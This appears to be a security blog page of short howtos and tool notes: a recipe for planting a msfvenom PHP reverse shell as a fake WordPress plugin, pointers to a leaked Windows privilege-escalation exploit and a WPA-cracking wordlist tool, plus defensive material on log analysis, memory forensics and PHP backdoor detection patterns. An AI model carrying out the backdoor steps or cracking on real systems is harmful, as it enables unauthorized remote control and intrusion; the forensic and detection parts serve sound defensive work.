Aug 3, 2015

Howto: create backdoor in Wordpress

1. Admin access to WordPress

2. Create a PHP reverse shell with msfvenom and name the file shell.php: msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw > shell.php

3. Add a plugin header comment at the top of shell.php so WordPress accepts it as a valid plugin, then compress it in zip format
<?php
/*
 * Plugin Name: My Shell
 * Plugin URI: https://github.com/r0rshark/wordpress-shell
 * Description: Execute Commands as the webserver you are serving wordpress with
 * Author: r0rshark
 * Version: 0.2
 * Author URI: https://r0rshark.github.io
 */

4. Set up a listener on the IP and port used in the msfvenom command

5. Trigger the reverse shell by visiting www.target.com/wp-content/plugins/shell/shell.php

Source: https://r0rshark.github.io/2015/07/30/google/

Howto: Use Scalp (web access log analysis)

1. Download Apache-Scalp
https://code.google.com/p/apache-scalp/

2. Download default_filter.xml
https://raw.githubusercontent.com/PHPIDS/PHPIDS/master/lib/IDS/default_filter.xml

3. Run Scalp against the access log
# python scalp-0.4.py --log /var/log/nginx/access.log
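As an added example (not part of Scalp or this post), the core of what Scalp does, in Python 3: load a filter file in the layout of PHPIDS default_filter.xml, URL-decode each request in an access log and report which filters match it. The three filter rules, the log lines and the addresses below are constructed stand-ins, not the real PHPIDS rules.

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed filter file in the layout of PHPIDS default_filter.xml (three simplified stand-in rules).
FILTER_XML = r"""<filters>
  <filter><id>1</id><rule><![CDATA[(?i)<\s*script]]></rule><description>script tag</description><tags><tag>xss</tag></tags><impact>4</impact></filter>
  <filter><id>2</id><rule><![CDATA[(?:\.\.[\\/])]]></rule><description>directory traversal</description><tags><tag>dt</tag></tags><impact>5</impact></filter>
  <filter><id>3</id><rule><![CDATA[(?i)union\s+select]]></rule><description>union select</description><tags><tag>sqli</tag></tags><impact>6</impact></filter>
</filters>"""

# One nginx/Apache "combined" log line: ip ident user [time] "METHOD url PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def load_filters(xml_text):
    """Return [(id, regex, tags, impact)]; rules Python's re cannot compile are skipped, as Scalp does."""
    filters = []
    for f in ET.fromstring(xml_text).findall("filter"):
        try:
            rx = re.compile(f.findtext("rule"))
        except re.error:
            continue
        tags = [t.text for t in f.find("tags").findall("tag")]
        filters.append((int(f.findtext("id")), rx, tags, int(f.findtext("impact"))))
    return filters

def analyze(log_lines, filters):
    """URL-decode each request and test it against every filter; return one hit per (line, filter) match."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line; skipped rather than guessed at
        url = urllib.parse.unquote_plus(m.group("url"))  # %2e%2e -> .. so encoded payloads still match
        for fid, rx, tags, impact in filters:
            if rx.search(url):
                hits.append({"ip": m.group("ip"), "url": url, "filter": fid, "tags": tags, "impact": impact})
    return hits

# Constructed access log lines (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jul/2015:10:01:02 +0000] "GET /index.php?page=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 512 "-" "curl/7.43"',
    '203.0.113.5 - - [22/Jul/2015:10:01:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jul/2015:10:02:05 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jul/2015:10:03:00 +0000] "GET /item?id=1+UNION+SELECT+1,2 HTTP/1.1" 500 0 "-" "sqlmap"',
]
```

Matching of this kind only sees the request line, so a plain GET to a backdoor that is already installed (such as the shell.php in the WordPress howto above) produces no hit; pair it with file-integrity checks on the web root.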

Jul 22, 2015

Howto: Memory Acquisition for Forensics

Summary from: https://alexandreborgesbrazil.files.wordpress.com/2014/06/memory-acquisition_win_linux1.pdf

Memory Acquisition on Windows
  • DumpIt from MoonSols (http://www.moonsols.com/downloads/7) using DumpIT.exe
  • Memoryze from Mandiant/FireEye (https://www.mandiant.com/library/MemoryzeSetup3.0.msi) using MemoryDD.bat
Initial analysis with Mandiant's Redline (https://www.mandiant.com/library/Redline-1.12.msi)

Memory acquisition on a Linux system
  • https://code.google.com/p/lime-forensics/downloads/list
  • https://github.com/504ensicslabs/lime
    • Compile with make
    • Install the kernel module with
      • insmod lime-3.7-trunk-amd64.ko "path=/media/external_drive/kali_memory_dump.bin format=lime"
    • The memory dump is written to /media/external_drive/kali_memory_dump.bin
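Added example, not from the summarized PDF or the LiME project: a Python 3 check that walks a dump written with format=lime, validating the 32-byte header in front of every RAM range (magic 0x4C694D45, version 1, inclusive start and end addresses) and confirming each range is fully present, so a truncated or corrupted acquisition is caught before analysis starts. The header layout is the one LiME documents; build_lime exists only to construct test data.

```python
import io
import struct

LIME_MAGIC = 0x4C694D45            # "LiME"; stored little-endian, so a dump starts with the bytes b"EMiL"
HEADER = struct.Struct("<IIQQ8s")  # magic, version, s_addr, e_addr, reserved[8]: 32 bytes per range

def parse_lime(fh):
    """Walk a format=lime dump (seekable binary file) and return [(s_addr, e_addr, length)] per RAM range.
    Raises ValueError on a bad magic or version, an inverted range, or a dump that ends mid-range."""
    size = fh.seek(0, 2)
    fh.seek(0)
    ranges, off = [], 0
    while off < size:
        hdr = fh.read(HEADER.size)
        if len(hdr) < HEADER.size:
            raise ValueError("truncated header at offset %d" % off)
        magic, version, s_addr, e_addr, _reserved = HEADER.unpack(hdr)
        if magic != LIME_MAGIC:
            raise ValueError("bad magic 0x%08x at offset %d" % (magic, off))
        if version != 1:
            raise ValueError("unsupported header version %d" % version)
        if e_addr < s_addr:
            raise ValueError("inverted range 0x%x-0x%x at offset %d" % (s_addr, e_addr, off))
        length = e_addr - s_addr + 1   # e_addr is inclusive, as in /proc/iomem
        off += HEADER.size
        if off + length > size:
            raise ValueError("range 0x%x-0x%x truncated: %d of %d bytes present"
                             % (s_addr, e_addr, size - off, length))
        ranges.append((s_addr, e_addr, length))
        off += length
        fh.seek(off)  # skip the range contents without reading them into memory
    return ranges

def verify(src):
    """(True, ranges) for a well-formed dump, (False, reason) otherwise; accepts bytes or a binary file."""
    if isinstance(src, (bytes, bytearray)):
        src = io.BytesIO(src)
    try:
        return True, parse_lime(src)
    except ValueError as exc:
        return False, str(exc)

def build_lime(segments):
    """Construct test data only: each (s_addr, payload) becomes one LiME header plus its payload."""
    out = b""
    for s_addr, payload in segments:
        out += HEADER.pack(LIME_MAGIC, 1, s_addr, s_addr + len(payload) - 1, b"\0" * 8) + payload
    return out
```

On a real acquisition, call verify(open('/media/external_drive/kali_memory_dump.bin', 'rb')); range contents are skipped with seek, so a multi-gigabyte dump is checked without loading it.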

Tools: PEframe - an open source tool for static analysis of Portable Executable malware

PEframe is an open source tool to perform static analysis on Portable Executable (PE) malware.

Source:: https://github.com/guelfoweb/peframe

Tools: hacking-team-windows-kernel-lpe - exploit from the Hacking Team leak, written by Eugene Ching/Qavar.

This is an exploit for CVE-2015-2426 (MS15-078), a Windows kernel local privilege escalation 0day from the Hacking Team archive (email here). It was developed by Eugene Ching / Qavar Security. Original contents below:

Windows kernel memory corruption exploit leading to privilege escalation.
Tested on Windows 8.1 fully-patched (as of 28 Jan 2015).
Also tested to work against:
  • Google Chrome, up to v40.0.2214.93 (64-bit); and
  • Google Chrome Canary, up to v42.0.2290.6 canary (64-bit)
assuming a suitable RCE in Chrome (simulated via injecting a thread into Chrome)

Source:: https://github.com/vlad902/hacking-team-windows-kernel-lpe

Jul 18, 2015

Tools: MicEnum

In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Level (IL) based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set on files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.
MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of the objects (files and folders) on the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps to detect anomalies in them by spotting differing integrity levels.
  • Allows this information to be stored in and restored from an XML file so it may be used for forensic purposes.

Source:: https://www.elevenpaths.com/labstools/micenum/index.html

Howto: Uninstall GlobalProtect on a Mac

1. Go to the GlobalProtect resources folder
# cd /Applications/GlobalProtect.app/Contents/Resources

2. Run the uninstall script
# sudo bash uninstall_gp.sh

Jul 17, 2015

Tools: passgen - an alternative to the character generator crunch, aimed at cracking WPA/WPA2 keys

Passgen is an alternative to the character generator crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output, as opposed to generating a sequential list (aaaaaaaa, aaaaaaab, aaaaaaac, etc.).
Example usage with aircrack-ng: python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap
The argument switches are as follows:
  • -l lowercase ascii
  • -l1 lowercase ascii + digits (0-9)
  • -U uppercase ascii
  • -U1 uppercase ascii + digits
  • -lU lowercase + uppercase ascii
  • -lU1 lowercase + uppercase ascii + digits
  • -C [char] [length] custom character set + length
This application will be updated with new features as needed.

Source:: https://github.com/blmvxer/passgen/

Jul 16, 2015

Tools: Evomalware - a simple BASH script to detect malware/viruses/backdoors, especially in PHP files.

EvoMalware is a BASH script that identifies files (PHP only at the moment) infected by malware, viruses or backdoors.
The main goal is to run it from a cron job to generate reports, but it can also be used in "one shot" mode.
The script uses 3 flat text files as databases:
  • evomalware.filenames, known filenames.
  • evomalware.patterns, known patterns.
  • evomalware.whitelist, files to ignore.
There is also an "aggressive" mode which finds suspect files using the evomalware.suspect DB.
At each run, the script downloads the latest databases.
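Added example, not part of Evomalware or of the WordPress post above: a Python 3 scanner that combines the two ideas on this page, Evomalware's filename/pattern/whitelist databases and the plugin header comment a backdoor needs in order to pass as a plugin, to flag PHP files under wp-content/plugins. The indicator lists and sample files are constructed stand-ins for evomalware.patterns, evomalware.filenames and evomalware.whitelist; keying the whitelist by SHA-1 is an assumption.

```python
import hashlib
import os
import re
PATTERNS = {  # constructed stand-ins for evomalware.patterns
    "eval": re.compile(r"\beval\s*\("),
    "base64": re.compile(r"\bbase64_decode\s*\("),
    "exec": re.compile(r"\b(?:shell_exec|system|passthru|proc_open|popen)\s*\("),
    "socket": re.compile(r"\b(?:fsockopen|stream_socket_client)\s*\("),
}
KNOWN_FILENAMES = {"shell.php", "c99.php", "r57.php"}  # constructed stand-in for evomalware.filenames
# The "Key: value" lines WordPress reads from a file's first 8 KB to accept it as a plugin.
HEADER_RE = re.compile(r"^[ \t/*#@]*(Plugin Name|Plugin URI|Author|Version):\s*(.+?)\s*$", re.M)

def plugin_header(src):
    """Parse a plugin header comment like the one in the WordPress howto above into a dict."""
    return dict(HEADER_RE.findall(src[:8192]))

def scan_source(relpath, src, whitelist=frozenset()):
    """Return a finding for one PHP file, or None; whitelist holds SHA-1 digests of files to ignore."""
    digest = hashlib.sha1(src.encode()).hexdigest()
    if digest in whitelist:
        return None
    reasons = [name for name, rx in PATTERNS.items() if rx.search(src)]
    if os.path.basename(relpath) in KNOWN_FILENAMES:
        reasons.append("known_filename")
    if not reasons:
        return None
    header = plugin_header(src)
    # A plugin header wrapped around eval/exec/socket primitives is the backdoor-as-plugin pattern.
    severity = "high" if header and {"eval", "exec", "socket"} & set(reasons) else "medium"
    return {"path": relpath, "sha1": digest, "reasons": reasons,
            "plugin": header.get("Plugin Name"), "severity": severity}

def scan_tree(root, whitelist=frozenset()):
    """Walk a wp-content/plugins directory and collect findings for every .php file under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                finding = scan_source(os.path.relpath(full, root), fh.read(), whitelist)
            if finding:
                findings.append(finding)
    return findings

# Constructed samples: the page's header around a socket call (stand-in for msfvenom output), and a benign plugin.
SAMPLE_BACKDOOR = "<?php\n/*\n * Plugin Name: My Shell\n * Version: 0.2\n */\n$sock = fsockopen($host, $port, $errno, $errstr, 30);\n"
SAMPLE_BENIGN = "<?php\n/*\n * Plugin Name: Hello Footer\n * Version: 1.0\n */\nadd_action('wp_footer', function () { echo '<p>Hello</p>'; });\n"
```

Run scan_tree('/var/www/html/wp-content/plugins') on a real install; the pattern list is deliberately short, so treat findings as candidates for review, not verdicts.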

Source:: https://github.com/evoforge/evomalware